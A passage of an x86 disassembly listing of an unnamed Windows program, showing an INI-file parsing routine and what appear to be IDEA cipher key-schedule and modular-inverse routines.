var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
; FUNCTION CHUNK AT 004D71B6 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E33F8
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 64h
push ebx
push esi
push edi
and [ebp+var_34], 0
and [ebp+var_28], 0
and [ebp+var_38], 0
and [ebp+var_20], 0
and [ebp+var_30], 0
and [ebp+var_3C], 0
and [ebp+var_24], 0
and [ebp+var_48], 0
and [ebp+var_40], 0
and [ebp+var_44], 0
and [ebp+var_4], 0
mov ecx, [ebp+arg_10]
xor eax, eax
mov edi, [ebp+arg_C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 0
lea eax, [ebp+var_2C]
push eax
push 0
push 0
push [ebp+arg_14]
call sub_4D5346
lea eax, [ebp+var_28]
push eax
push [ebp+var_2C]
call sub_4D5672
mov eax, [ebp+var_28]
inc eax
push eax
call sub_4DD35A
pop ecx
mov [ebp+var_64], eax
mov eax, [ebp+var_64]
mov [ebp+var_34], eax
mov ecx, [ebp+var_28]
inc ecx
xor eax, eax
mov edi, [ebp+var_34]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
lea eax, [ecx+eax+1]
mov [ebp+var_20], eax
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
lea eax, [ebp+var_1C]
push eax
push 0
push 0
push [ebp+var_28]
push [ebp+var_34]
push [ebp+var_2C]
call sub_4D6177
mov eax, [ebp+var_20]
mov byte ptr [eax-1], 0Ah
jmp short loc_4D6DAD
; ---------------------------------------------------------------------------
loc_4D6DA6: ; CODE XREF: sub_4D6CC4:loc_4D7184�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_4D6DAD: ; CODE XREF: sub_4D6CC4+E0�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz loc_4D7189
loc_4D6DB9: ; CODE XREF: sub_4D6CC4+486�j
; sub_4D6CC4+4BB�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Bh
jnz short loc_4D6DF8
loc_4D6DC4: ; CODE XREF: sub_4D6CC4+125�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz short loc_4D6DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D6DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D6DEB
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D6DC4
; ---------------------------------------------------------------------------
loc_4D6DEB: ; CODE XREF: sub_4D6CC4+106�j
; sub_4D6CC4+111�j ...
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jnz short loc_4D6DF8
jmp loc_4D7189
; ---------------------------------------------------------------------------
loc_4D6DF8: ; CODE XREF: sub_4D6CC4+FE�j
; sub_4D6CC4+12D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Bh
jnz short loc_4D6E16
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_30], eax
mov [ebp+var_24], 1
jmp loc_4D7184
; ---------------------------------------------------------------------------
loc_4D6E16: ; CODE XREF: sub_4D6CC4+13D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Dh
jnz loc_4D6EBF
loc_4D6E25: ; CODE XREF: sub_4D6CC4+217�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
cmp [ebp+var_24], 1
jnz loc_4D6EBA
and [ebp+var_24], 0
cmp [ebp+arg_0], 0
jnz short loc_4D6EA0
mov eax, [ebp+var_44]
mov [ebp+var_4C], eax
mov edi, [ebp+var_30]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_54], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_4C]
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jle short loc_4D6E9E
push [ebp+var_50]
push [ebp+var_30]
mov eax, [ebp+arg_C]
add eax, [ebp+var_4C]
push eax
call sub_4D1770
add esp, 0Ch
mov eax, [ebp+var_50]
cmp eax, [ebp+var_54]
jle short loc_4D6E8B
mov eax, [ebp+var_54]
mov [ebp+var_74], eax
jmp short loc_4D6E91
; ---------------------------------------------------------------------------
loc_4D6E8B: ; CODE XREF: sub_4D6CC4+1BD�j
mov eax, [ebp+var_50]
mov [ebp+var_74], eax
loc_4D6E91: ; CODE XREF: sub_4D6CC4+1C5�j
mov eax, [ebp+var_74]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+1]
mov [ebp+var_44], eax
loc_4D6E9E: ; CODE XREF: sub_4D6CC4+1A0�j
jmp short loc_4D6EBA
; ---------------------------------------------------------------------------
loc_4D6EA0: ; CODE XREF: sub_4D6CC4+179�j
push [ebp+var_30]
push [ebp+arg_0]
call ds:dword_4E67C0 ;; lstrcmpi
test eax, eax
jnz short loc_4D6EB6
mov [ebp+var_48], 1
jmp short loc_4D6EBA
; ---------------------------------------------------------------------------
loc_4D6EB6: ; CODE XREF: sub_4D6CC4+1EA�j
and [ebp+var_48], 0
loc_4D6EBA: ; CODE XREF: sub_4D6CC4+16B�j
; sub_4D6CC4:loc_4D6E9E�j ...
jmp loc_4D7184
; ---------------------------------------------------------------------------
loc_4D6EBF: ; CODE XREF: sub_4D6CC4+15B�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D6ED5
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4D6EEC
loc_4D6ED5: ; CODE XREF: sub_4D6CC4+204�j
cmp [ebp+var_24], 1
jnz short loc_4D6EE0
jmp loc_4D6E25
; ---------------------------------------------------------------------------
loc_4D6EE0: ; CODE XREF: sub_4D6CC4+215�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
jmp loc_4D7184
; ---------------------------------------------------------------------------
loc_4D6EEC: ; CODE XREF: sub_4D6CC4+20F�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_4D7184
cmp [ebp+arg_0], 0
jz loc_4D7151
mov eax, [ebp+var_38]
mov byte ptr [eax], 20h
loc_4D6F0B: ; CODE XREF: sub_4D6CC4+266�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 9
jz short loc_4D6F23
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_4D6F2C
loc_4D6F23: ; CODE XREF: sub_4D6CC4+251�j
mov eax, [ebp+var_38]
dec eax
mov [ebp+var_38], eax
jmp short loc_4D6F0B
; ---------------------------------------------------------------------------
loc_4D6F2C: ; CODE XREF: sub_4D6CC4+25D�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_4D6F39: ; CODE XREF: sub_4D6CC4+292�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 9
jz short loc_4D6F4F
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4D6F58
loc_4D6F4F: ; CODE XREF: sub_4D6CC4+27E�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D6F39
; ---------------------------------------------------------------------------
loc_4D6F58: ; CODE XREF: sub_4D6CC4+289�j
cmp [ebp+arg_4], 0
jnz loc_4D70A1
movzx eax, [ebp+var_48]
test eax, eax
jz loc_4D709C
mov eax, [ebp+var_44]
mov [ebp+var_58], eax
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
cmp eax, [ebp+var_60]
jge short loc_4D6F9F
mov eax, [ebp+var_6C]
mov [ebp+var_78], eax
jmp short loc_4D6FA5
; ---------------------------------------------------------------------------
loc_4D6F9F: ; CODE XREF: sub_4D6CC4+2D1�j
mov eax, [ebp+var_60]
mov [ebp+var_78], eax
loc_4D6FA5: ; CODE XREF: sub_4D6CC4+2D9�j
mov eax, [ebp+var_78]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_4D6FD4
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_4D6FD4: ; CODE XREF: sub_4D6CC4+2EB�j
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_4D6FDA: ; CODE XREF: sub_4D6CC4+33C�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D7002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D7002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D7002
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D6FDA
; ---------------------------------------------------------------------------
loc_4D7002: ; CODE XREF: sub_4D6CC4+31D�j
; sub_4D6CC4+328�j ...
movzx eax, [ebp+arg_18]
test eax, eax
jz loc_4D708E
mov eax, [ebp+arg_10]
dec eax
dec eax
cmp [ebp+var_58], eax
jnb short loc_4D7028
mov eax, [ebp+arg_C]
add eax, [ebp+var_58]
mov byte ptr [eax], 3Dh
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_58], eax
loc_4D7028: ; CODE XREF: sub_4D6CC4+352�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_70], eax
mov eax, [ebp+var_70]
cmp eax, [ebp+var_60]
jge short loc_4D7059
mov eax, [ebp+var_70]
mov [ebp+var_7C], eax
jmp short loc_4D705F
; ---------------------------------------------------------------------------
loc_4D7059: ; CODE XREF: sub_4D6CC4+38B�j
mov eax, [ebp+var_60]
mov [ebp+var_7C], eax
loc_4D705F: ; CODE XREF: sub_4D6CC4+393�j
mov eax, [ebp+var_7C]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_4D708E
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_4D708E: ; CODE XREF: sub_4D6CC4+344�j
; sub_4D6CC4+3A5�j
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_44], eax
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
loc_4D709C: ; CODE XREF: sub_4D6CC4+2A4�j
jmp loc_4D714F
; ---------------------------------------------------------------------------
loc_4D70A1: ; CODE XREF: sub_4D6CC4+298�j
push [ebp+var_3C]
push [ebp+arg_4]
call ds:dword_4E67C0 ;; lstrcmpi
test eax, eax
jnz short loc_4D711C
movzx eax, [ebp+var_48]
test eax, eax
jz short loc_4D711C
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_4D70BF: ; CODE XREF: sub_4D6CC4+421�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D70E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D70E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D70E7
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D70BF
; ---------------------------------------------------------------------------
loc_4D70E7: ; CODE XREF: sub_4D6CC4+402�j
; sub_4D6CC4+40D�j ...
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+var_3C]
push [ebp+arg_C]
call sub_4D1770
add esp, 0Ch
mov eax, [ebp+arg_C]
add eax, [ebp+arg_10]
and byte ptr [eax-1], 0
mov edi, [ebp+arg_C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_44], ecx
jmp short loc_4D7189
; ---------------------------------------------------------------------------
loc_4D711C: ; CODE XREF: sub_4D6CC4+3EB�j
; sub_4D6CC4+3F3�j ...
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D7144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D7144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D7144
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D711C
; ---------------------------------------------------------------------------
loc_4D7144: ; CODE XREF: sub_4D6CC4+45F�j
; sub_4D6CC4+46A�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_4D6DB9
; ---------------------------------------------------------------------------
loc_4D714F: ; CODE XREF: sub_4D6CC4:loc_4D709C�j
jmp short loc_4D7184
; ---------------------------------------------------------------------------
loc_4D7151: ; CODE XREF: sub_4D6CC4+23B�j
; sub_4D6CC4+4B3�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D7179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D7179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D7179
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D7151
; ---------------------------------------------------------------------------
loc_4D7179: ; CODE XREF: sub_4D6CC4+494�j
; sub_4D6CC4+49F�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_4D6DB9
; ---------------------------------------------------------------------------
loc_4D7184: ; CODE XREF: sub_4D6CC4+14D�j
; sub_4D6CC4:loc_4D6EBA�j ...
jmp loc_4D6DA6
; ---------------------------------------------------------------------------
loc_4D7189: ; CODE XREF: sub_4D6CC4+EF�j
; sub_4D6CC4+12F�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_4D7194
jmp short loc_4D71B6
sub_4D6CC4 endp
; =============== S U B R O U T I N E =======================================
sub_4D7194 proc near ; CODE XREF: sub_4D6CC4+4C9�p
; DATA XREF: _5:004E3400�o
mov eax, [ebp-34h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_4DD3DD
pop ecx
cmp dword ptr [ebp-2Ch], 0FFFFFFFFh
jz short locret_4D71B5
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-2Ch]
call sub_4D5741
locret_4D71B5: ; CODE XREF: sub_4D7194+13�j
retn
sub_4D7194 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D6CC4
loc_4D71B6: ; CODE XREF: sub_4D6CC4+4CE�j
mov eax, [ebp+var_44]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D6CC4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
push dword ptr [ebp-4]
push dword ptr [ebp+8]
mov ecx, [ebp-4]
call sub_4D71F3
mov eax, [ebp-4]
add eax, 68h
push eax
push dword ptr [ebp-4]
mov ecx, [ebp-4]
call sub_4D729B
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D71F3 proc near ; CODE XREF: _4:004D71D8�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
and [ebp+var_8], 0
jmp short loc_4D7209
; ---------------------------------------------------------------------------
loc_4D7202: ; CODE XREF: sub_4D71F3+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D7209: ; CODE XREF: sub_4D71F3+D�j
cmp [ebp+var_8], 8
jge short loc_4D7235
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
shl eax, 8
mov ecx, [ebp+arg_0]
movzx ecx, byte ptr [ecx+1]
add eax, ecx
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx+ecx*2], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
jmp short loc_4D7202
; ---------------------------------------------------------------------------
loc_4D7235: ; CODE XREF: sub_4D71F3+1A�j
and [ebp+var_4], 0
jmp short loc_4D7242
; ---------------------------------------------------------------------------
loc_4D723B: ; CODE XREF: sub_4D71F3+A2�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D7242: ; CODE XREF: sub_4D71F3+46�j
cmp [ebp+var_8], 34h
jge short locret_4D7297
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov ecx, [ebp+arg_4]
movzx eax, word ptr [ecx+eax*2]
shl eax, 9
mov ecx, [ebp+var_4]
inc ecx
and ecx, 7
mov edx, [ebp+arg_4]
movzx ecx, word ptr [edx+ecx*2]
sar ecx, 7
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [edx+ecx*2+0Eh], ax
mov eax, [ebp+var_4]
and eax, 8
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*2]
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov [ebp+var_4], eax
jmp short loc_4D723B
; ---------------------------------------------------------------------------
locret_4D7297: ; CODE XREF: sub_4D71F3+53�j
leave
retn 8
sub_4D71F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D729B proc near ; CODE XREF: _4:004D71EA�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = word ptr -7Ch
var_78 = dword ptr -78h
var_74 = word ptr -74h
var_70 = word ptr -70h
var_6C = word ptr -6Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push esi
push edi
mov [ebp+var_80], ecx
lea eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_84], ax
push [ebp+var_84]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D759C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_88], ax
push [ebp+var_88]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D759C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
and [ebp+var_78], 0
jmp short loc_4D7372
; ---------------------------------------------------------------------------
loc_4D736B: ; CODE XREF: sub_4D729B+1D7�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_4D7372: ; CODE XREF: sub_4D729B+CE�j
cmp [ebp+var_78], 7
jge loc_4D7477
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_8C], ax
push [ebp+var_8C]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D759C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_90], ax
push [ebp+var_90]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D759C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
jmp loc_4D736B
; ---------------------------------------------------------------------------
loc_4D7477: ; CODE XREF: sub_4D729B+DB�j
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_94], ax
push [ebp+var_94]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D759C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_98], ax
push [ebp+var_98]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D759C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
push 1Ah
pop ecx
lea esi, [ebp+var_6C]
mov edi, [ebp+arg_4]
rep movsd
and [ebp+var_78], 0
jmp short loc_4D7585
; ---------------------------------------------------------------------------
loc_4D757E: ; CODE XREF: sub_4D729B+2F9�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_4D7585: ; CODE XREF: sub_4D729B+2E1�j
cmp [ebp+var_78], 34h
jge short loc_4D7596
mov eax, [ebp+var_78]
and [ebp+eax*2+var_6C], 0
jmp short loc_4D757E
; ---------------------------------------------------------------------------
loc_4D7596: ; CODE XREF: sub_4D729B+2EE�j
pop edi
pop esi
leave
retn 8
sub_4D729B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D759C proc near ; CODE XREF: sub_4D729B+32�p
; sub_4D729B+81�p ...
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
movzx eax, [ebp+arg_0]
cmp eax, 1
jg short loc_4D75B7
mov ax, [ebp+arg_0]
jmp locret_4D768F
; ---------------------------------------------------------------------------
loc_4D75B7: ; CODE XREF: sub_4D759C+10�j
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_C], ax
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_4D75F7
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
jmp locret_4D768F
; ---------------------------------------------------------------------------
loc_4D75F7: ; CODE XREF: sub_4D759C+42�j
mov [ebp+var_8], 1
loc_4D75FD: ; CODE XREF: sub_4D759C+DF�j
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+arg_0], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_C]
imul eax, ecx
mov cx, [ebp+var_8]
add cx, ax
mov [ebp+var_8], cx
movzx eax, [ebp+arg_0]
cmp eax, 1
jnz short loc_4D7640
mov ax, [ebp+var_8]
jmp short locret_4D768F
; ---------------------------------------------------------------------------
loc_4D7640: ; CODE XREF: sub_4D759C+9C�j
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_8]
imul eax, ecx
mov cx, [ebp+var_C]
add cx, ax
mov [ebp+var_C], cx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_4D75FD
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
locret_4D768F: ; CODE XREF: sub_4D759C+16�j
; sub_4D759C+56�j ...
leave
retn 4
sub_4D759C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_4D76AF
; ---------------------------------------------------------------------------
loc_4D76A8: ; CODE XREF: _4:004D76D1�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_4D76AF: ; CODE XREF: _4:004D76A6�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_4D76D3
push dword ptr [ebp-0Ch]
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_4D76D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_4D76A8
; ---------------------------------------------------------------------------
locret_4D76D3: ; CODE XREF: _4:004D76B5�j
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D76D7 proc near ; CODE XREF: _4:004D76C3�p _4:004D7D36�p
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
